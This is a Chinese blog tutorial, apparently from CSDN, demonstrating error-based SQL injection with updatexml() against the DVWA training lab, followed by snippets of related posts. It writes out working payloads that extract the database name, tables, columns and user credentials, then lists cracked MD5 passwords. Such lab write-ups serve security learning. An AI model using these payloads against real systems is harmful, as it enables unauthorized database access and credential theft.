SQL注入之报错注入

于 2024-07-19 17:23:52 发布
阅读量804 收藏 8
点赞数 9
文章标签: sql mybatis mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63156954/article/details/140542771
版权

以DVWA靶场为例:

一、测试注入点既类型:

输入'

        存在注入点且为符号型单引号闭合型

二、获取数据库名:

输入'and (updatexml(1,concat(0x7e,(select database()),0x7e),1))='1

数据库名为dvwa

三、获取数据库表名:

输入'and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),0x7e),1))='1

        数据库dvwa中有两个表,分别叫guestbook,users

        猜测登录账号密码在users里

四、获取users里的字段名

输入'and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'),0x7e),1))='1

        为什么会出现显示不全的情况呢?(右边的~未显示)

        因为报错显示位有限(32位),据猜测字段语义我们可以排除已经显示的几个字段里不存在我们需要的账户与密码,所以接下来我们用substring()函数查看后面的字段名

输入'and (updatexml(1,concat(0x7e,(select substring(group_concat(column_name),25,30) from information_schema.columns where table_name='users' and table_schema='dvwa'),0x7e),1))='1

        显然我们要的账号与密码分别在user与password字段中

五、获取user与password字段具体的值

        同样我们获取具体值的时候也要注意报错显示只有32位,这里我们用limit()函数限制每次读取一对账号密码(limit 0,1表示只查询1条数据,索引从0开始,第1条记录,依次修改索引,将全部数据读出)

读取第一对账号密码:

输入'and (updatexml(1,concat(0x7e,(select concat('~',user,'~',password,'~') from users limit 0,1),0x7e),1))='1

        这里明显显示不全,为了将密码全部一次读出,多次构造注入尝试,发现无法一次读出完整密码,只能分两次读出并拼接,多次尝试发现substring(32,35)刚好可以读出剩余密码以便拼接。

输入'and (updatexml(1,concat(0x7e,(select substring(concat('~',user,'~',password,'~'),32,35) from users limit 0,1),0x7e),1))='1

账号为:admin

密码拼接后:431a90268fe4538ec36e1bb6307418dc

发现md5解密失败!估计是测试账号

        依次更改limit()函数的参数,从limit 0,1-->limt 1,1-->...-->limit 4,1-->...一直到无响应为止,将剩余账号密码读出并解密

账号2:

账号:gordonb

密码拼接后:e99a18c428cb38d5f260853678922e03

解密后:abc123

账号3:

账号:1337

密码拼接后:8d3533d75ae2c3966d7e0d4fcc69216b

解密后:charley

账号4:

账号:pablo

密码拼接后:0d107d09f5bbe40cade3de5c71e9e9b7

解密后:letmein

账号5:

账号:smithy

密码拼接后:5f4dcc3b5aa765d61d8327deb882cf99

解密后:password

输入'and (updatexml(1,concat(0x7e,(select concat('~',user,'~',password,'~') from users limit 5,1),0x7e),1))='1

        无响应,故可判断数据库内只存放了五对账号密码

        我们还可以通过联合查询注入(见我的博文《SQL注入基础篇》)验证我们查询的真伪:

输入1' union select user,password from users#

        可以看到和我们报错注入的结果一致。

网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 9767
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL注入报错注入函数
cyjmosthandsome的博客
02-26 6824
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
DVWA系列---基于报错的SQL注入SQL Injection)
野原新之助
02-06 1283
文章目录1、Low2、Medium3、High
SQL注入-报错注入
qq_65240014的博客
08-08 869
本文主要介绍一种结合burpsuite的报错注入sql注入方法
SQL注入入门学习笔记:DVWA-SQL注入报错注入
2301_78774803的博客
10-11 289
结果为:XPATH syntax error: '~admin,gordonb,1337,pablo,smithy',最后的“~”没有出现,所以需要继续查询。1' and updatexml(1,'database()~',3)#的结果为:XPATH syntax error: '()~'结果为:XPATH syntax error: '~9~',最后一个“~”出现,说明已经显示完。结果为:XPATH syntax error: '~~',最后一个“~”出现,说明已经显示完。
Dvwa sql low 联合注入,报错注入
最新发布
m0_73581247的博客
06-03 355
rand 值)如果此时临时表只有 key 为 1 的行不存在 key 为 0 的行,那么数据库要将该条记录插入临。时表,由于是随机数,插时又要计算一下随机值,此时 floor(random(0)*2)结果可能为 1,就。如果 key 存在于临时表中,则更新临时表中的数据(更新数据时,不再计算 rand 值);实际测试中发现,出现报错,至少要求数据记录为 3 行,记录数超过 3 行一定会报错,2 行。输入1,数据正常显示,输入1’,页面显示爆错,1附近多出现了一个逗号。Id=1 and 1=2 页面无显示。
sql注入报错注入
2401_82760239的博客
04-02 1674
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
33-33.渗透测试渗透测试之SQL注入基于报错注入(下)
05-10
渗透测试渗透测试之SQL注入基于报错注入(下)
SQL注入——报错型注入
qq_41554179的博客
03-12 601
报错型sql注入 报错型sql注入上述sql注入的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示sql语句。下边是利用count(*), FLOOR(RAND(0)*2,group by报错。 语句: - AND(SELECT 1 FROM (SELECT COUNT(*...
DVWA sql注入-LOW
m0_46616663的博客
05-23 609
1.判断是否存在sql注入漏洞 出现报错,说明存在sql注入漏洞,无论是字符型还是整形都会因为单引号个数不匹配而报错。 如果未报错则未必存在sql注入,有可能存在对输入内容的过滤,采用其他方法判断是否存在注入。 2.判断注入漏洞的类型 分为两种: 数字型和字符型。 这是数据库本身存储数据时赋予给数据的类型。 先判断是否为数字型: 输入1 and 1 = 1 页面运行正常 输入1 and 1 = 2 页面也运行正常 分析: 如果查询语句为数字型的话...
《WEB安全渗透测试》(3)SQL注入实战:报错注入
午夜安全
10-02 1028
《WEB安全渗透测试》(3)SQL注入实战:报错注入 1)考虑使用报错注入URL:http://www.tianchi.com/web/error.php?username=1URL:http://www.tianchi.com/web/error.php?username=1'由于多了一个',SQL语句执行时会报错。而这里程序直接将错误信息输出到了页面上,所以可以利用报错注入来获取数据。2)获取user()的值报错注入有多种格式,这里使用updatexml()函数,......
报错注入
j7ur8
06-22 1989
长期更新报错注入的知识,把代码审计这本书上的10种报错姿势吃透。这是一个神奇的登陆界面-floor()报错注入这道题目....给了我新的姿势把, 第一次真正研究报错注入。题目测试很容易 输入"会报错然后就是进行报错注入,测试了一番,没有过滤。然后进行floor()的报错注入1. 开始的姿势:1" and (select 1 from (select count(*), concat(floor(r...
DVWA进行SQL注入
Jo_kong的博客
10-02 4800
我用的是在VMware下的虚拟机,在这就不说安装kali和win7了,各位自己去网上找一下大神们的教程,就很容易安装了。(统一说明:为了安全性等各方面考虑,下载软件最好到各大软件的官网上去下载)我用的系统如下: kali:192.168.0.183 进行SQL注入 win7:192.168.0.184 搭建dvwa环境 dvwa使用PHP写的,所以首先需要搭建web运行环境,我这里使用...
SQL注入攻击之报错注入
qq_36242914的博客
03-29 308
SQL注入攻击之报错注入 1.floor(rand(0)*2) 注入语句:select and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 报错注入原理: 报错关键点group by floor((rand(0)*2)) 1. rand(0)生成一组以0为种子产生一组固定随机数:0.15522...,0.62088..
SQL注入报错注入
qq_45557130的博客
10-07 593
sql注入报错注入
get基于报错的sql注入
冷巷(✘_✘)的博客
07-14 1110
目录1.SQL注入的分类数字型字符型2.get基于报错的sql注入发现3.get基于报错的sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询,获取表名。3.利用union select联合查询,获取字段名。4.利用union select 联合查询,获取字段值。4.利用sqlmap测试根据注入为数据类型可将sql注入分为数字型和字符型。例如 字符型 例如 2.get基于报错的sql注入发现 通过在url中修改对应的id值,为正常数字、打数字、字符(单引
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1507
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA靶场之SQL注入通关详解(1),网络安全开发进阶吃透这一篇必拿60W年薪
m0_61068088的博客
04-05 851
然后回到dvwa界面,发现页面中把所有的name和Surname都列出来了。因此这里可以判断注入点的类型为数字型且不需要闭合。接下来判断字段数,当查询语句为1 or 1=1 order by 2时,页面能正常显示,但是当把2换成3时,页面就会报错,因此这里的字段数为2。接下来,再通过union select来确定回显位置。然后使用1 union select 1,database()#语句来查询数据库。
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句执行失败。 2. 数据库对updatexml函数的支持不完整,某些版本的数据库可能不支持某些参数或功能,导致SQL语句执行失败。 3. 输入的注入payload不正确,可能造成语法错误或类型不匹配等问题,导致SQL语句执行失败。 为了解决这个问题,你可以尝试以下方法: 1. 检查SQL语句中updatexml函数的使用是否正确,确保参数数量和类型正确。 2. 检查数据库版本和配置,确保数据库对updatexml函数的支持完整。 3. 检查输入的注入payload是否正确,可以使用工具或手动构造payload进行测试,找出问题所在。 此外,为了避免SQL注入等安全漏洞,建议在编写代码时使用参数化查询,或对输入进行严格的过滤和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zhanduanwanfeng

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值